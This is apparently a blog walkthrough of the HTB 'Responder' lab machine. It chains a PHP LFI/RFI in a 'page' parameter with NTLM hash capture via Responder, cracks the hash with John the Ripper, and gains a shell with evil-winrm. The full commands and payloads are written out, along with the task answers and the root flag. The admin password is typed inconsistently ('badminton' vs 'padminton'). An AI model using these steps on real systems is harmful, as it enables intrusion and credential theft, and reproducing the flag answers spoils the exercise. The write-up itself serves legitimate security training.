HTB Labs — Tier 1 — “Responder” Machine Walkthrough | By: CyberAlp0

Hey Folks, this is CyberAlp0. Welcome to a new walkthrough powered by HTB, Tier 1, named “Responder”. The Responder machine is designed to introduce fundamental concepts of web application vulnerabilities, NTLM authentication abuse, and cross-service exploitation in Windows environments. This lab demonstrates how a seemingly simple Local and Remote File Inclusion vulnerability can be chained with NTLM authentication leakage to fully compromise a Windows host.
Executive Summary
Here is an executive summary of the steps we will follow:
Stage I: Scanning
Initial reconnaissance was performed to identify exposed services and understand the target’s attack surface. Network scanning revealed two primary open services: HTTP on port 80 and WinRM (WSMan) on port 5985, indicating a Windows-based system.
Stage II: Enumeration
Web enumeration revealed a language-switching feature controlled by a page URL parameter, which was found to be vulnerable to Local File Inclusion (LFI). By exploiting this flaw, sensitive local system files could be accessed, confirming improper input validation. Further testing identified that the application also accepted remote file paths, indicating a potential Remote File Inclusion (RFI) condition.
When attempting to load remote resources, the server initiated an authentication request, exposing the use of NTLM authentication. This behaviour revealed an opportunity to capture NTLM challenge-response hashes by forcing the server to authenticate to an attacker-controlled host.
Stage III: Exploiting
Exploitation was achieved by leveraging the RFI vulnerability to trigger outbound NTLM authentication requests from the target server. By running Responder on the attacker machine, a NetNTLMv2 hash for the Administrator account was successfully captured. The hash was then cracked offline using John the Ripper, revealing the Administrator password.
With valid credentials obtained, remote access to the system was established using Evil-WinRM over port 5985. This provided an interactive PowerShell session on the target machine, allowing full system access and enabling retrieval of the root flag.
Let’s not waste more time on the introduction and begin hacking in detail!
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Starting to Solve the Tasks.
Task 1: When visiting the web service using the IP address, what is the domain that we are being redirected to?
Answer: Unika.htb
Walkthrough:
When typing the IP address of the machine on the browser, you will notice that it will redirect you to the http://unika.htb

Since, scanning the targets is used to be the first step we normally take to understand the nature of the web application, we will use the NmapAutomator tool to better understand the target.

Upon the scanning we will find that there are two services running:
- The first service is HTTP and it is running over port 80
- The second service is wsman and running through port 5985. The web server is likely a windows server.
Task 2: Which scripting language is being used on the server to generate web pages?
Answer: PHP
Walkthrough:
You can identify the scripting language that is being used using the curl command. Type the following command and find out the response:
curl -I 10.129.8.213
Task 3: What is the name of the URL parameter which is used to load different language versions of the web page?
Answer: page
Walkthrough:
There isn’t one single universal name, but this kind of URL parameter is generally called a language parameter (or locale parameter). Developers choose their own parameter names. To identify the parameter that is being used in our case, record the machine IP in the /etc/hosts against the web service that is trying to reach to (Based on task 1).
Nano the /etc/hosts file as shown in the following screenshot:

After adding the domain, login to the unika.htb from the browser, and you will see that the web page is loaded

After viewing the web page, and changing the language from English to another language, you will find out that the URL parameter that displays the language is called “page”.
Task 4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer: ../../../../../../../../windows/system32/drivers/etc/hosts
Walkthrough:
LFI (Local File Inclusion) is a web vulnerability where an attacker can make a website load files from the server’s local filesystem by manipulating input (often a URL parameter).
LFI lets the hackers read or execute local files on the server that were never meant to be accessible.
In our task, the question is testing whether you can manipulate the parameters in the URL and see whether the server will respond with sensitive information that are not meant to be disclosed. As you may see in the web page that the URL is:
http://unika.htb/index.php?page=french.html
The idea behind the question is to see which value of the four will replace the current value of the parameter “page” in which it will cause disclosing sensitive information. As per the task we have four values:
1- ../../../../../../../../windows/system32/drivers/etc/hosts
2- minikatz.exe
3- french.html
4- //10.10.14.6/somefile
The answer is going to be the first value, as changing the value of the parameter “page” from “french.html” to “../../../../../../../../windows/system32/drivers/etc/hosts”, this will make the request go to the server asking it to execute the value of the parameter “page”, which is in our case “../../../../../../../../windows/system32/drivers/etc/hosts”.
This will make the server map to the predefined path placed in the value of the parameter “Page”, in result, the server will respond with what is written in the “hosts” file, as shown in the following screenshot.

Task 5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
Answer: //10.10.14.6/somefile
Walkthrough:
You need to know the main differences between the LFI and RFI. Just take a look to this table to have a better overview:

Based on the differences between LFI and RFI, the correct answer will be //10.10.14.6/somefile.
Note that you will change the value of the IP address and replace it with the IP address of the machine or the remote server.

As per the screenshot, it tells us the action is not permitted and denied, which means that there is an authentication process running on this server
Task 6: What does NTLM stand for?
Answer: New Technology Lan Manager
Walkthrough:
It worth mentioning that NTLM is a legacy authentication protocol developed by Microsoft for Windows networks. It was used primarily in Windows NT and early Active Directory environments to verify user identities without sending plain text passwords over the network.
NTLM is still supported for backward compatibility, but it is outdated and insecure for modern enterprise environments.
Task 7: Which flag do we use in the Responder utility to specify the network interface?
Answer: -I
Walkthrough:
In Responder, the flag used to specify the network interface is -I. In case we are going to be listening for any events on the eth0, we will use the eth0 interface. In case we are running over VPN, we will connect through the tun0 or whatever interfaces we are using.
sudo responder -I tun0To identify the network interfaces in your system, run the following command:
ifconfig or ip a 
Task 8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?
Answer: John The Ripper
Walkthrough:
John The Ripper is a password‑cracking tool, It is Commonly used to crack NetNTLMv2 challenge/response hashes and performs dictionary and brute‑force attacks.
Task 9: What is the password for the administrator user?
Answer: badminton
Walkthrough:
Let’s wrap up the findings so far about the target to understand how we can get the password of the administrator and the flag of the machine.
First: Upon the scanning, the server is likely running on windows server.
Second: Upon the enumeration stage, we find that the web server is vulnerable to LFI, which gives us the ability to view remote and hosted files on the target’s server. Also, the web server is likely vulnerable to RFI, which gives us the ability to execute remote files from remote servers on the target’s servers.
Third: There is an authentication running on the windows server when trying to call any files from a remote server.
Based on the information we gathered so far, we will try to see the type of authentication that is running on the server. To do so, we will use the responder tool to listen for any coming events on our IP address that runs through our network interface. Once trying to recall any file from our machine, the target’s server will try authenticate this action and respond with a response.

Based on what we stated, we will run the responder on our machine and monitor any incoming events coming from the target’s web servers when manipulating the URL to be:
http://unika.htb/index.php?page=//10.10.14.192/somefile

The responder will be running in the background and it will give us more insights of the authentication that is used. and it will provide us with more information about the web server along with the credentials needed to access.

By using JohnTheRipper, we will decrypt the hash. Copy the hash starting from the “Administrator and paste it in txt file, and use the following command to brute force the hash.
john -w=/usr/share/wordlists/rockyou.txt "Hash File location"
You will find out that the password of “Administrator” is “badminton”
Task 10: We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
Answer: 5985
Walkthrough:
As per the scanning we preformed on the first step. we will notice that there is a service called “wsman” and running over port 5985. we will used a tool called Evil-WinRM. It is a post-exploitation / remote access tool used in penetration testing to get an interactive PowerShell shell on a Windows machine via WinRM (Windows Remote Management).

Task 11: Submit The Root Flag
Answer: ea81b7afddd03efaa0945333ed147fac
Walkthrough:
By using the Evil-Winrm tool, we will get remote access to the windows server. Write the following command:
evil-winrm -i 10.129.95.234 -u administrator -p padminton
After connection just navigate two directories back till you reach the users directory, then go into the user directory who is called “mike”, then go to his desktop. You will find the flag.txt there.

Note that you can view the content of the flag using the command “type flag.txt’
The root flag of the machine is “ea81b7afddd03efaa0945333ed147fac”
Hope you enjoyed reading my blog about solving the “Responder” machine from HTB — Tier 1 — Starting Point Phase.
See you in another write-up!.


